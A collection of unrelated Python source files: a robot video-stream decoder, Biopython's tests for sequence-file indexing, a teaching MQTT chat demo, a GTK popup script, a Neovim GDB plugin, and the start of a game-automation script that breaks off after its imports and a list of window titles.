def __init__(self, robot, display_buffer_size=10):
self.robot = robot
self.log = logger.Logger(self)
self.running = False
self.display_running = False
self.video_decoder = libh264decoder.H264Decoder()
self.display_buffer = queue.Queue(maxsize=display_buffer_size)
self._decoder_thread = threading.Thread(target=self._decoder_thread_task)
self._display_thread = threading.Thread(target=self._display_thread_task)
libh264decoder.disable_logging()
def start(self):
self.robot.basic_ctrl.video_stream_on()
self.robot.connection.start_video_recv()
self._decoder_thread.start()
self.log.info("VideoStream thread started.")
def display(self):
self._display_thread.start()
self.log.info("Display thread started.")
def _decoder_thread_task(self):
self.running = True
package_data = b''
while self.running and threading.main_thread().is_alive():
buff = self.robot.connection.get_video_data()
if buff:
package_data += buff
if len(buff) != 1460:
for frame in self._h264_decode(package_data):
try:
self.display_buffer.put(frame, timeout=2)
except Exception:
self.log.debuginfo('display buffer full.')
package_data = b''
self.log.debuginfo('Shutted down VideoDecoder thread successfully.')
self.running = False
def _h264_decode(self, packet_data):
res_frame_list = []
frames = self.video_decoder.decode(packet_data)
for framedata in frames:
(frame, w, h, ls) = framedata
if frame is not None:
frame = np.fromstring(
frame, dtype=np.ubyte, count=len(frame), sep='')
frame = (frame.reshape((h, int(ls / 3), 3)))
frame = frame[:, :w, :]
res_frame_list.append(frame)
return res_frame_list
def _display_thread_task(self):
self.display_running = True
while self.display_running and threading.main_thread().is_alive():
frame = self.get_frame(timeout=2)
if frame is not None:
image = PImage.fromarray(frame)
img = cv2.cvtColor(np.array(image), cv2.COLOR_RGB2BGR)
cv2.imshow("Liveview", img)
cv2.waitKey(1)
self.log.debuginfo('Shutted down Display thread successfully.')
self.display_running = False
def get_last_frame(self):
try:
return self.display_buffer[0]
except IndexError:
self.log.debuginfo("Fail to get last frame: display buffer empty.")
return None
def get_frame(self, timeout=2):
try:
return self.display_buffer.get(timeout)
except Exception:
self.log.debuginfo("Fail to get frame: display buffer empty.")
@property
def last_frame(self):
return self.get_last_frame()
|
test_SeqIO_index.py
|
# Copyright 2009-2017 by Peter Cock. All rights reserved.
# This code is part of the Biopython distribution and governed by its
# license. Please see the LICENSE file that should have been included
# as part of this package.
"""Unit tests for Bio.SeqIO.index(...) and index_db() functions."""
try:
import sqlite3
except ImportError:
# Try to run what tests we can in case sqlite3 was not installed
sqlite3 = None
import os
import unittest
import tempfile
import threading
import gzip
import warnings
from io import BytesIO
from io import StringIO
from Bio.SeqRecord import SeqRecord
from Bio import SeqIO
from Bio.SeqIO._index import _FormatToRandomAccess
from Bio import BiopythonParserWarning
from Bio import MissingPythonDependencyError
from seq_tests_common import SeqRecordTestBaseClass
from test_SeqIO import SeqIOTestBaseClass
CUR_DIR = os.getcwd()
if sqlite3:
def raw_filenames(index_filename):
"""Open SQLite index and extract filenames (as is).
Returns a 2-tuple, holding a list of strings, and the value
of the meta_data.filenames_relative_to_index (or None).
"""
con = sqlite3.dbapi2.connect(index_filename)
filenames = [
row[0]
for row in con.execute(
"SELECT name FROM file_data ORDER BY file_number;"
).fetchall()
]
try:
(filenames_relative_to_index,) = con.execute(
"SELECT value FROM meta_data WHERE key=?;",
("filenames_relative_to_index",),
).fetchone()
filenames_relative_to_index = filenames_relative_to_index.upper() == "TRUE"
except TypeError:
filenames_relative_to_index = None
con.close()
return filenames, filenames_relative_to_index
class OldIndexTest(unittest.TestCase):
"""Testing a pre-built index (make sure cross platform etc).
>>> from Bio import SeqIO
>>> d = SeqIO.index_db("triple_sff.idx", ["E3MFGYR02_no_manifest.sff", "greek.sff", "paired.sff"], "sff")
>>> len(d)
54
"""
def setUp(self):
os.chdir(CUR_DIR)
def tearDown(self):
os.chdir(CUR_DIR)
def test_old(self):
"""Load existing index with no options (from parent directory)."""
d = SeqIO.index_db("Roche/triple_sff.idx")
self.assertEqual(54, len(d))
self.assertRaises(FileNotFoundError, d.get_raw, "alpha")
def test_old_check_same_thread(self):
"""Setting check_same_thread to False doesn't raise an exception."""
d = SeqIO.index_db("Roche/triple_sff_rel_paths.idx")
def reader_thread():
try:
d["alpha"]
except sqlite3.ProgrammingError:
self.fail(
"Raised sqlite3.ProgrammingError in violation of check_same_thread=False"
)
reader = threading.Thread(target=reader_thread)
reader.start()
reader.join()
def test_old_rel(self):
"""Load existing index (with relative paths) with no options (from parent directory)."""
d = SeqIO.index_db("Roche/triple_sff_rel_paths.idx")
self.assertEqual(54, len(d))
self.assertEqual(395, len(d["alpha"]))
def test_old_contents(self):
"""Check actual filenames in existing indexes."""
filenames, flag = raw_filenames("Roche/triple_sff.idx")
self.assertIsNone(flag)
self.assertEqual(
filenames, ["E3MFGYR02_no_manifest.sff", "greek.sff", "paired.sff"]
)
filenames, flag = raw_filenames("Roche/triple_sff_rel_paths.idx")
self.assertTrue(flag)
self.assertEqual(
filenames, ["E3MFGYR02_no_manifest.sff", "greek.sff", "paired.sff"]
)
def test_old_same_dir(self):
"""Load existing index with no options (from same directory)."""
os.chdir("Roche")
d = SeqIO.index_db("triple_sff.idx")
self.assertEqual(54, len(d))
self.assertEqual(395, len(d["alpha"]))
def test_old_same_dir_rel(self):
"""Load existing index (with relative paths) with no options (from same directory)."""
os.chdir("Roche")
d = SeqIO.index_db("triple_sff_rel_paths.idx")
self.assertEqual(54, len(d))
self.assertEqual(395, len(d["alpha"]))
def test_old_format(self):
"""Load existing index with correct format."""
d = SeqIO.index_db("Roche/triple_sff.idx", format="sff")
self.assertEqual(54, len(d))
def test_old_format_wrong(self):
"""Load existing index with wrong format."""
self.assertRaises(
ValueError, SeqIO.index_db, "Roche/triple_sff.idx", format="fasta"
)
def test_old_files(self):
"""Load existing index with correct files (from parent directory)."""
d = SeqIO.index_db(
"Roche/triple_sff.idx",
["E3MFGYR02_no_manifest.sff", "greek.sff", "paired.sff"],
)
self.assertEqual(54, len(d))
self.assertRaises(FileNotFoundError, d.get_raw, "alpha")
def test_old_files_same_dir(self):
"""Load existing index with correct files (from same directory)."""
os.chdir("Roche")
d = SeqIO.index_db(
"triple_sff.idx",
["E3MFGYR02_no_manifest.sff", "greek.sff", "paired.sff"],
)
self.assertEqual(54, len(d))
self.assertEqual(395, len(d["alpha"]))
def test_old_files_wrong(self):
"""Load existing index with wrong files."""
self.assertRaises(
ValueError,
SeqIO.index_db,
"Roche/triple_sff.idx",
["a.sff", "b.sff", "c.sff"],
)
def test_old_files_wrong2(self):
"""Load existing index with wrong number of files."""
self.assertRaises(
ValueError,
SeqIO.index_db,
"Roche/triple_sff.idx",
["E3MFGYR02_no_manifest.sff", "greek.sff"],
)
class NewIndexTest(unittest.TestCase):
"""Check paths etc in newly built index."""
def setUp(self):
os.chdir(CUR_DIR)
def tearDown(self):
os.chdir(CUR_DIR)
for i in ["temp.idx", "Roche/temp.idx"]:
if os.path.isfile(i):
os.remove(i)
def check(self, index_file, sff_files, expt_sff_files):
if os.path.isfile(index_file):
os.remove(index_file)
# Build index...
d = SeqIO.index_db(index_file, sff_files, "sff")
self.assertEqual(395, len(d["alpha"]))
d._con.close() # hack for PyPy
d.close()
self.assertEqual(
[os.path.abspath(f) for f in sff_files],
[os.path.abspath(f) for f in d._filenames],
)
# Now directly check the filenames inside the SQLite index:
filenames, flag = raw_filenames(index_file)
self.assertTrue(flag)
self.assertEqual(filenames, expt_sff_files)
# Load index...
d = SeqIO.index_db(index_file, sff_files)
self.assertEqual(395, len(d["alpha"]))
d._con.close() # hack for PyPy
d.close()
self.assertEqual([os.path.abspath(f) for f in sff_files], d._filenames)
os.remove(index_file)
def test_child_folder_rel(self):
"""Check relative links to child folder."""
# Note we expect relative paths recorded with Unix slashs!
expt_sff_files = [
"Roche/E3MFGYR02_no_manifest.sff",
"Roche/greek.sff",
"Roche/paired.sff",
]
self.check("temp.idx", expt_sff_files, expt_sff_files)
# Here index is given as abs
self.check(
os.path.abspath("temp.idx"),
[
"Roche/E3MFGYR02_no_manifest.sff",
os.path.abspath("Roche/greek.sff"),
"Roche/paired.sff",
],
expt_sff_files,
)
# Here index is given as relative path
self.check(
"temp.idx",
[
"Roche/E3MFGYR02_no_manifest.sff",
os.path.abspath("Roche/greek.sff"),
"Roche/paired.sff",
],
expt_sff_files,
)
def test_same_folder(self):
"""Check relative links in same folder."""
os.chdir("Roche")
expt_sff_files = ["E3MFGYR02_no_manifest.sff", "greek.sff", "paired.sff"]
# Here everything is relative,
self.check("temp.idx", expt_sff_files, expt_sff_files)
self.check(
os.path.abspath("temp.idx"),
[
"E3MFGYR02_no_manifest.sff",
os.path.abspath("greek.sff"),
"../Roche/paired.sff",
],
expt_sff_files,
)
self.check(
"temp.idx",
[
"E3MFGYR02_no_manifest.sff",
os.path.abspath("greek.sff"),
"../Roche/paired.sff",
],
expt_sff_files,
)
self.check(
"../Roche/temp.idx",
[
"E3MFGYR02_no_manifest.sff",
os.path.abspath("greek.sff"),
"../Roche/paired.sff",
],
expt_sff_files,
)
def test_some_abs(self):
"""Check absolute filenames in index.
Unless the repository and tests themselves are under the temp
directory (as detected by ``tempfile``), we expect the index to
use absolute filenames.
"""
h, t = tempfile.mkstemp(prefix="index_test_", suffix=".idx")
os.close(h)
os.remove(t)
abs_sff_files = [
os.path.abspath("Roche/E3MFGYR02_no_manifest.sff"),
os.path.abspath("Roche/greek.sff"),
os.path.abspath(os.path.join("Roche", "paired.sff")),
]
if os.getcwd().startswith(os.path.dirname(t)):
# The tests are being run from within the temp directory,
# e.g. index filename /tmp/index_test_XYZ.idx
# and working directory of /tmp/biopython/Tests/
# This means the indexing will use a RELATIVE path
# e.g. biopython/Tests/Roche/E3MFGYR02_no_manifest.sff
# not /tmp/biopython/Tests/Roche/E3MFGYR02_no_manifest.sff
expt_sff_files = [
os.path.relpath(f, os.path.dirname(t)) for f in abs_sff_files
]
else:
expt_sff_files = abs_sff_files
# Providing absolute paths...
self.check(t, abs_sff_files, expt_sff_files)
# Now try with mix of abs and relative paths...
self.check(
t,
[
os.path.abspath("Roche/E3MFGYR02_no_manifest.sff"),
os.path.join("Roche", "greek.sff"),
os.path.abspath("Roche/paired.sff"),
],
expt_sff_files,
)
class IndexDictTests(SeqRecordTestBaseClass, SeqIOTestBaseClass):
tests = [
("Ace/contig1.ace", "ace"),
("Ace/consed_sample.ace", "ace"),
("Ace/seq.cap.ace", "ace"),
("Quality/wrapping_original_sanger.fastq", "fastq"),
("Quality/example.fastq", "fastq"), # Unix newlines
("Quality/example.fastq", "fastq-sanger"),
("Quality/example_dos.fastq", "fastq"), # DOS/Windows newlines
("Quality/tricky.fastq", "fastq"),
("Quality/sanger_faked.fastq", "fastq-sanger"),
("Quality/solexa_faked.fastq", "fastq-solexa"),
("Quality/illumina_faked.fastq", "fastq-illumina"),
("Quality/zero_length.fastq", "fastq"),
("EMBL/epo_prt_selection.embl", "embl"),
("EMBL/U87107.embl", "embl"),
("EMBL/TRBG361.embl", "embl"),
("EMBL/kipo_prt_sample.embl", "embl"),
("EMBL/A04195.imgt", "embl"), # Not a proper EMBL file, an IMGT file
("EMBL/A04195.imgt", "imgt"),
("EMBL/hla_3260_sample.imgt", "imgt"),
("EMBL/patents.embl", "embl"),
("EMBL/AAA03323.embl", "embl"),
("GenBank/NC_000932.faa", "fasta"),
("GenBank/NC_005816.faa", "fasta"),
("GenBank/NC_005816.tsv", "tab"),
("GenBank/NC_005816.ffn", "fasta"),
("GenBank/NC_005816.fna", "fasta"),
("GenBank/NC_005816.gb", "gb"),
("GenBank/cor6_6.gb", "genbank"),
("GenBank/empty_accession.gbk", "gb"),
("GenBank/empty_version.gbk", "gb"),
("IntelliGenetics/vpu_nucaligned.txt", "ig"),
("IntelliGenetics/TAT_mase_nuc.txt", "ig"),
("IntelliGenetics/VIF_mase-pro.txt", "ig"),
("Phd/phd1", "phd"),
("Phd/phd2", "phd"),
("Phd/phd_solexa", "phd"),
("Phd/phd_454", "phd"),
("NBRF/B_nuc.pir", "pir"),
("NBRF/Cw_prot.pir", "pir"),
("NBRF/clustalw.pir", "pir"),
("SwissProt/sp001", "swiss"),
("SwissProt/sp010", "swiss"),
("SwissProt/sp016", "swiss"),
("SwissProt/multi_ex.txt", "swiss"),
("SwissProt/multi_ex.xml", "uniprot-xml"),
("SwissProt/multi_ex.fasta", "fasta"),
("Roche/E3MFGYR02_random_10_reads.sff", "sff"),
("Roche/E3MFGYR02_random_10_reads.sff", "sff-trim"),
("Roche/E3MFGYR02_index_at_start.sff", "sff"),
("Roche/E3MFGYR02_index_in_middle.sff", "sff"),
("Roche/E3MFGYR02_alt_index_at_start.sff", "sff"),
("Roche/E3MFGYR02_alt_index_in_middle.sff", "sff"),
("Roche/E3MFGYR02_alt_index_at_end.sff", "sff"),
("Roche/E3MFGYR02_no_manifest.sff", "sff"),
("Roche/greek.sff", "sff"),
("Roche/greek.sff", "sff-trim"),
("Roche/paired.sff", "sff"),
("Roche/paired.sff", "sff-trim"),
]
def setUp(self):
os.chdir(CUR_DIR)
h, self.index_tmp = tempfile.mkstemp("_idx.tmp")
os.close(h)
def tearDown(self):
os.chdir(CUR_DIR)
if os.path.isfile(self.index_tmp):
os.remove(self.index_tmp)
def check_dict_methods(self, rec_dict, keys, ids, msg):
self.assertCountEqual(keys, rec_dict.keys(), msg=msg)
# This is redundant, I just want to make sure len works:
self.assertEqual(len(keys), len(rec_dict), msg=msg)
# Make sure boolean evaluation works
self.assertEqual(bool(keys), bool(rec_dict), msg=msg)
for key, id in zip(keys, ids):
self.assertIn(key, rec_dict, msg=msg)
self.assertEqual(id, rec_dict[key].id, msg=msg)
self.assertEqual(id, rec_dict.get(key).id, msg=msg)
# Check non-existant keys,
assert chr(0) not in keys, "Bad example in test"
with self.assertRaises(KeyError, msg=msg):
rec = rec_dict[chr(0)]
self.assertIsNone(rec_dict.get(chr(0)), msg=msg)
self.assertEqual(rec_dict.get(chr(0), chr(1)), chr(1), msg=msg)
with self.assertRaises(AttributeError, msg=msg):
rec_dict.iteritems
for key, rec in rec_dict.items():
self.assertIn(key, keys, msg=msg)
self.assertIsInstance(rec, SeqRecord, msg=msg)
self.assertIn(rec.id, ids, msg=msg)
for rec in rec_dict.values():
self.assertIn(key, keys, msg=msg)
self.assertIsInstance(rec, SeqRecord, msg=msg)
self.assertIn(rec.id, ids, msg=msg)
def simple_check(self, filename, fmt, comp):
"""Check indexing (without a key function)."""
msg = "Test failure parsing file %s with format %s" % (filename, fmt)
if comp:
mode = "r" + self.get_mode(fmt)
with gzip.open(filename, mode) as handle:
id_list = [rec.id for rec in SeqIO.parse(handle, fmt)]
else:
id_list = [rec.id for rec in SeqIO.parse(filename, fmt)]
with warnings.catch_warnings():
if "_alt_index_" in filename:
# BiopythonParserWarning: Could not parse the SFF index:
# Unknown magic number b'.diy' in SFF index header:
# b'.diy1.00'
warnings.simplefilter("ignore", BiopythonParserWarning)
rec_dict = SeqIO.index(filename, fmt)
self.check_dict_methods(rec_dict, id_list, id_list, msg=msg)
rec_dict.close()
if not sqlite3:
return
# In memory,
# note here give filenames as list of strings
rec_dict = SeqIO.index_db(":memory:", [filename], fmt)
self.check_dict_methods(rec_dict, id_list, id_list, msg=msg)
rec_dict.close()
# check error conditions
with self.assertRaises(ValueError, msg=msg):
SeqIO.index_db(":memory:", format="dummy")
with self.assertRaises(ValueError, msg=msg):
SeqIO.index_db(":memory:", filenames=["dummy"])
# Saving to file...
index_tmp = self.index_tmp
if os.path.isfile(index_tmp):
os.remove(index_tmp)
# To disk,
# note here we give the filename as a single string
# to confirm that works too.
rec_dict = SeqIO.index_db(index_tmp, filename, fmt)
self.check_dict_methods(rec_dict, id_list, id_list, msg=msg)
rec_dict.close()
rec_dict._con.close() # hack for PyPy
# Now reload it...
rec_dict = SeqIO.index_db(index_tmp, [filename], fmt)
self.check_dict_methods(rec_dict, id_list, id_list, msg=msg)
rec_dict.close()
rec_dict._con.close() # hack for PyPy
# Now reload without passing filenames and format
# and switch directory to check paths still work
index_tmp = os.path.abspath(index_tmp)
os.chdir(os.path.dirname(filename))
try:
rec_dict = SeqIO.index_db(index_tmp)
finally:
os.chdir(CUR_DIR)
self.check_dict_methods(rec_dict, id_list, id_list, msg=msg)
rec_dict.close()
rec_dict._con.close() # hack for PyPy
os.remove(index_tmp)
def add_prefix(self, key):
"""Sample key_function for testing index code."""
return "id_" + key
def key_check(self, filename, fmt, comp):
"""Check indexing with a key function."""
msg = "Test failure parsing file %s with format %s" % (filename, fmt)
if comp:
mode = "r" + self.get_mode(fmt)
with gzip.open(filename, mode) as handle:
id_list = [rec.id for rec in SeqIO.parse(handle, fmt)]
else:
id_list = [rec.id for rec in SeqIO.parse(filename, fmt)]
key_list = [self.add_prefix(id) for id in id_list]
with warnings.catch_warnings():
if "_alt_index_" in filename:
# BiopythonParserWarning: Could not parse the SFF index:
# Unknown magic number b'.diy' in SFF index header:
# b'.diy1.00'
warnings.simplefilter("ignore", BiopythonParserWarning)
rec_dict = SeqIO.index(filename, fmt, key_function=self.add_prefix)
self.check_dict_methods(rec_dict, key_list, id_list, msg=msg)
rec_dict.close()
if not sqlite3:
return
# In memory,
rec_dict = SeqIO.index_db(
":memory:", [filename], fmt, key_function=self.add_prefix
)
self.check_dict_methods(rec_dict, key_list, id_list, msg=msg)
# check error conditions
with self.assertRaises(ValueError, msg=msg):
SeqIO.index_db(":memory:", format="dummy", key_function=self.add_prefix)
with self.assertRaises(ValueError, msg=msg):
SeqIO.index_db(
":memory:", filenames=["dummy"], key_function=self.add_prefix
)
rec_dict.close()
# Saving to file...
index_tmp = filename + ".key.idx"
if os.path.isfile(index_tmp):
os.remove(index_tmp)
rec_dict = SeqIO.index_db(
index_tmp, [filename], fmt, key_function=self.add_prefix
)
self.check_dict_methods(rec_dict, key_list, id_list, msg=msg)
rec_dict.close()
rec_dict._con.close() # hack for PyPy
# Now reload it...
rec_dict = SeqIO.index_db(
index_tmp, [filename], fmt, key_function=self.add_prefix
)
self.check_dict_methods(rec_dict, key_list, id_list, msg=msg)
rec_dict.close()
rec_dict._con.close() # hack for PyPy
# Now reload without passing filenames and format
rec_dict = SeqIO.index_db(index_tmp, key_function=self.add_prefix)
self.check_dict_methods(rec_dict, key_list, id_list, msg=msg)
rec_dict.close()
rec_dict._con.close() # hack for PyPy
os.remove(index_tmp)
# Done
def get_raw_check(self, filename, fmt, comp):
# Also checking the key_function here
msg = "Test failure parsing file %s with format %s" % (filename, fmt)
if comp:
with gzip.open(filename, "rb") as handle:
raw_file = handle.read()
mode = "r" + self.get_mode(fmt)
with gzip.open(filename, mode) as handle:
id_list = [rec.id.lower() for rec in SeqIO.parse(handle, fmt)]
else:
with open(filename, "rb") as handle:
raw_file = handle.read()
id_list = [rec.id.lower() for rec in SeqIO.parse(filename, fmt)]
if fmt in ["sff"]:
with warnings.catch_warnings():
warnings.simplefilter("ignore", BiopythonParserWarning)
rec_dict = SeqIO.index(filename, fmt, key_function=str.lower)
if sqlite3:
rec_dict_db = SeqIO.index_db(
":memory:", filename, fmt, key_function=str.lower,
)
else:
rec_dict = SeqIO.index(filename, fmt, key_function=str.lower)
if sqlite3:
rec_dict_db = SeqIO.index_db(
":memory:", filename, fmt, key_function=str.lower,
)
self.assertCountEqual(id_list, rec_dict.keys(), msg=msg)
if sqlite3:
self.assertCountEqual(id_list, rec_dict_db.keys(), msg=msg)
for key in id_list:
self.assertIn(key, rec_dict, msg=msg)
self.assertEqual(key, rec_dict[key].id.lower(), msg=msg)
self.assertEqual(key, rec_dict.get(key).id.lower(), msg=msg)
raw = rec_dict.get_raw(key)
self.assertIsInstance(raw, bytes, msg=msg)
self.assertTrue(raw.strip(), msg=msg)
self.assertIn(raw, raw_file, msg=msg)
if sqlite3:
raw_db = rec_dict_db.get_raw(key)
# Via index using format-specific get_raw which scans the file,
# Via index_db in general using raw length found when indexing.
self.assertEqual(raw, raw_db, msg=msg)
rec1 = rec_dict[key]
# Following isn't very elegant, but it lets me test the
# __getitem__ SFF code is working.
mode = self.get_mode(fmt)
if mode == "b":
handle = BytesIO(raw)
elif mode == "t":
handle = StringIO(raw.decode())
else:
raise RuntimeError("Unexpected mode %s" % mode)
if fmt == "sff":
rec2 = SeqIO.SffIO._sff_read_seq_record(
handle,
rec_dict._proxy._flows_per_read,
rec_dict._proxy._flow_chars,
rec_dict._proxy._key_sequence,
trim=False,
)
elif fmt == "sff-trim":
rec2 = SeqIO.SffIO._sff_read_seq_record(
handle,
rec_dict._proxy._flows_per_read,
rec_dict._proxy._flow_chars,
rec_dict._proxy._key_sequence,
trim=True,
)
elif fmt == "uniprot-xml":
self.assertTrue(raw.startswith(b"<entry "), msg=msg)
self.assertTrue(raw.endswith(b"</entry>"), msg=msg)
# Currently the __getitem__ method uses this
# trick too, but we hope to fix that later
raw = (
"""<?xml version='1.0' encoding='UTF-8'?>
<uniprot xmlns="http://uniprot.org/uniprot"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://uniprot.org/uniprot
http://www.uniprot.org/support/docs/uniprot.xsd">
%s
</uniprot>
"""
% raw.decode()
)
handle = StringIO(raw)
rec2 = SeqIO.read(handle, fmt)
else:
rec2 = SeqIO.read(handle, fmt)
self.compare_record(rec1, rec2)
rec_dict.close()
del rec_dict
if sqlite3:
def test_alpha_fails_db(self):
"""Reject alphabet argument in Bio.SeqIO.index_db()."""
# In historic usage, alphabet=... would be a Bio.Alphabet object.
self.assertRaises(
ValueError,
SeqIO.index_db,
":memory:",
["Fasta/dups.fasta"],
"fasta",
alphabet="XXX",
)
def test_alpha_fails(self):
"""Reject alphabet argument in Bio.SeqIO.index()."""
# In historic usage, alphabet=... would be a Bio.Alphabet object.
self.assertRaises(
ValueError, SeqIO.index, "Fasta/dups.fasta", "fasta", alphabet="XXX"
)
if sqlite3:
def test_duplicates_index_db(self):
"""Index file with duplicate identifiers with Bio.SeqIO.index_db()."""
self.assertRaises(
ValueError, SeqIO.index_db, ":memory:", ["Fasta/dups.fasta"], "fasta"
)
def test_duplicates_index(self):
"""Index file with duplicate identifiers with Bio.SeqIO.index()."""
self.assertRaises(ValueError, SeqIO.index, "Fasta/dups.fasta", "fasta")
def test_duplicates_to_dict(self):
"""Index file with duplicate identifiers with Bio.SeqIO.to_dict()."""
with open("Fasta/dups.fasta") as handle:
iterator = SeqIO.parse(handle, "fasta")
self.assertRaises(ValueError, SeqIO.to_dict, iterator)
def test_simple_checks(self):
for filename1, fmt in self.tests:
assert fmt in _FormatToRandomAccess
tasks = [(filename1, None)]
if os.path.isfile(filename1 + ".bgz"):
tasks.append((filename1 + ".bgz", "bgzf"))
for filename2, comp in tasks:
self.simple_check(filename2, fmt, comp)
def test_key_checks(self):
for filename1, fmt in self.tests:
assert fmt in _FormatToRandomAccess
tasks = [(filename1, None)]
if os.path.isfile(filename1 + ".bgz"):
tasks.append((filename1 + ".bgz", "bgzf"))
for filename2, comp in tasks:
self.key_check(filename2, fmt, comp)
def test_raw_checks(self):
for filename1, fmt in self.tests:
assert fmt in _FormatToRandomAccess
tasks = [(filename1, None)]
if os.path.isfile(filename1 + ".bgz"):
tasks.append((filename1 + ".bgz", "bgzf"))
for filename2, comp in tasks:
self.get_raw_check(filename2, fmt, comp)
class IndexOrderingSingleFile(unittest.TestCase):
f = "GenBank/NC_000932.faa"
ids = [r.id for r in SeqIO.parse(f, "fasta")]
def test_order_to_dict(self):
"""Check to_dict preserves order in indexed file."""
d = SeqIO.to_dict(SeqIO.parse(self.f, "fasta"))
self.assertEqual(self.ids, list(d))
def test_order_index(self):
"""Check index preserves order in indexed file."""
d = SeqIO.index(self.f, "fasta")
self.assertEqual(self.ids, list(d))
if sqlite3:
def test_order_index_db(self):
"""Check index_db preserves ordering indexed file."""
d = SeqIO.index_db(":memory:", [self.f], "fasta")
self.assertEqual(self.ids, list(d))
if sqlite3:
class IndexOrderingManyFiles(unittest.TestCase):
def test_order_index_db(self):
"""Check index_db preserves order in multiple indexed files."""
files = ["GenBank/NC_000932.faa", "GenBank/NC_005816.faa"]
ids = []
for f in files:
ids.extend(r.id for r in SeqIO.parse(f, "fasta"))
d = SeqIO.index_db(":memory:", files, "fasta")
self.assertEqual(ids, list(d))
if __name__ == "__main__":
runner = unittest.TextTestRunner(verbosity=2)
unittest.main(testRunner=runner)
|
mqtt.py
|
"""
JADS 2020 Data-Driven Food Value Chain course
Introduction to Sensors
Minimal MQTT client demo - demonstrates ease of use.
Makes use of the open http://www.mqtt-dashboard.com/index.html
And yes, globals are evil ;)
"""
import threading
import paho.mqtt.client as mqtt
import os
def on_connect(client, userdata, flags, rc):
global topic
global publisher_name
print("Welcome " + publisher_name + ", you're connected to " + topic + "\n")
print("Type 'q' to exit the chat.\n")
client.subscribe(topic)
def on_message(client, userdata, msg):
global publisher_name
incoming_message = msg.payload.decode()
splitted_msg = [x.strip() for x in incoming_message.split(',', 1)]
sender_name = splitted_msg[0]
if sender_name != publisher_name:
print(sender_name + ":" + splitted_msg[1])
def publish():
global publisher_name
global topic
new_msg = input()
if new_msg == "quit" or new_msg == "q" or new_msg == "exit" or new_msg == "quit()":
os._exit(1)
client.publish(topic, publisher_name + "," + new_msg)
return publish()
def receive():
client.on_connect = on_connect
client.on_message = on_message
client.loop_forever()
def config():
global publisher_name
global topic
while True:
publisher_name = input("Enter your username: ")
if publisher_name.isalpha():
break
print("Please enter characters A-Z only")
return "Loading chat (" + topic + ")..."
topic = "jads/intro-to-sensors"
print(config())
client = mqtt.Client()
client.connect("broker.hivemq.com", 1883, 60)
publish_thread = threading.Thread(target=publish)
receive_thread = threading.Thread(target=receive)
publish_thread.start()
receive_thread.start()
|
dialog.py
|
import threading
from time import sleep
import sys
import gi
gi.require_version('Gtk','3.0')
from gi.repository import Gtk
#Author : Reebal Javed Khan
# used to display some text/info passed as second argument to python executable
# example
# python dialog.py hello
# will display hello in a window for 1 second (default)
# I use it along nmcli to display if wifi has been enabled or disabled on pressing key combination using xkeybinds
# as I use dwm I don't need to use window size or position
n=len(sys.argv) # get number of arguments passed from commandline
arg1="" # initiliazing an empty string
if(n==2):
arg1=sys.argv[1] # if an extra argument in passed while running this program pass it to arg1
win = Gtk.Window() # create a gtk window
win.connect("destroy", Gtk.main_quit) # allow destruction of this window
labelx=Gtk.Label() # create label
labelx.set_text(arg1) # add arg1 as text to label
win.add(labelx) # add label to window
win.show_all() # show the window
def thread_function(name):
sleep(1)
Gtk.main_quit()
## applied threading and sleep for 1 second to display the window for 1 second
## after that kill the window and exit the program
x = threading.Thread(target=thread_function, args=(1,)) # thread initialization
x.start() # Start thread and let thread sleep for N seconds
Gtk.main() # Start main Gtk
x.join()
|
__init__.py
|
# ============================================================================
# FILE: __init__.py
# AUTHOR: Philip Karlsson Gisslow <philipkarlsson at me.com>
# License: MIT license
# ============================================================================
import neovim
import time
import threading
from nvgdb.nvgdb import NvGdb
@neovim.plugin
class NvGdbWrapper(object):
def __init__(self, nvim):
self.nvim = nvim
self.ng = NvGdb(nvim)
def server_wrapper(self):
self.ng.serve()
@neovim.command("NvGdbStart", range='', nargs='*', sync=True)
def NvGdbStart(self, args, range):
t = threading.Thread(target=self.server_wrapper, daemon=True)
t.start()
@neovim.command("NvGdbToggleBreakpoint", range='', nargs='*', sync=True)
def NvGdbToggleBreakpoint(self, args, range):
# Get current line and file
currentLine = self.nvim.command_output('echo line(".")')
currentFile = self.nvim.command_output('echo expand("%:p")')
self.ng.toggle_breakpoint(currentFile, currentLine)
@neovim.command("NvGdbSingleStep", range='', nargs='*', sync=True)
def NvGdbSingleStep(self, args, range):
self.ng.single_step()
@neovim.command("NvGdbStepOver", range='', nargs='*', sync=True)
def NvGdbStepOver(self, args, range):
self.ng.step_over()
@neovim.command("NvGdbStop", range='', nargs='*', sync=True)
def NvGdbStop(self, args, range):
self.ng.stop()
@neovim.command("NvGdbResume", range='', nargs='*', sync=True)
def NvGdbResume(self, args, range):
self.ng.resume()
@neovim.command("NvGdbReset", range='', nargs='*', sync=True)
def NvGdbReset(self, args, range):
self.ng.reset()
@neovim.command("NvGdbRefreshBreakpoints", range='', nargs='*', sync=True)
def NvGdbRefreshBreakpoints(self, args, range):
self.ng.refresh_breakpoints()
@neovim.command("NvGdbEvalWord", range='', nargs='*', sync=True)
def NvGdbEvalWord(self, args, range):
self.ng.eval_word()
@neovim.command("NvGdbShowStackTrace", range='', nargs='*', sync=True)
def NvGdbShowStackTrace(self, args, range):
self.ng.show_stack_trace()
@neovim.command("NvGdbSelectStackFrame", range='', nargs='*', sync=True)
def NvGdbSelectStackFrame(self, args, range):
self.ng.select_stack_frame_from_stack_window()
@neovim.command("NvGdbShowLog", range='', nargs='*', sync=True)
def NvGdbShowLog(self, args, range):
""" Show the R2Nvim log
Parameters:
n/a
Returns:
n/a
"""
self.nvim.command('e NvGdb_log')
self.nvim.command('setlocal buftype=nofile')
self.nvim.command('setlocal filetype=NvGdb_log')
logStr = self.ng.get_log()
self.nvim.current.buffer.append(logStr)
|
horikun.py
|
import win32gui, win32api, win32con
import time, random
import tkinter
import os, sys
import threading, inspect, ctypes
# 包装:pyinstaller -F -w horikun.py
# <editor-fold desc="horikun: 基本的界面及功能">
"""
常量定义
"""
TITLELIST = [": v1.1.8", ":最新版!(大概)", ": Hello World", ":持续更新中",
":扫地洗衣", ":偷袭暗杀", ":请问兼桑在这里吗?", "",
":自定义标题", ":兼桑————————", ":::", ":检非违使狩猎中",
"|ω・`)", ":( ˘ω˘`)", ":要不要剪个头发?", ": kanesan.love",
":( ^ ^`)", ":我来咏一句吧?梅(以下略)", ":这力量是铁 这力量是钢",
":兼桑兼桑兼桑", ":传说中的胁差", ":例行搜查", ":兄弟的筋肉",
":邪道", ":也不要忘了兄弟们哦", " : nuk-iroh", ":内置kanesan",
":内置兄弟", ": 欢迎来github提意见哦", ": also try KanColle-Auto!"]
# 每5min输出的提示
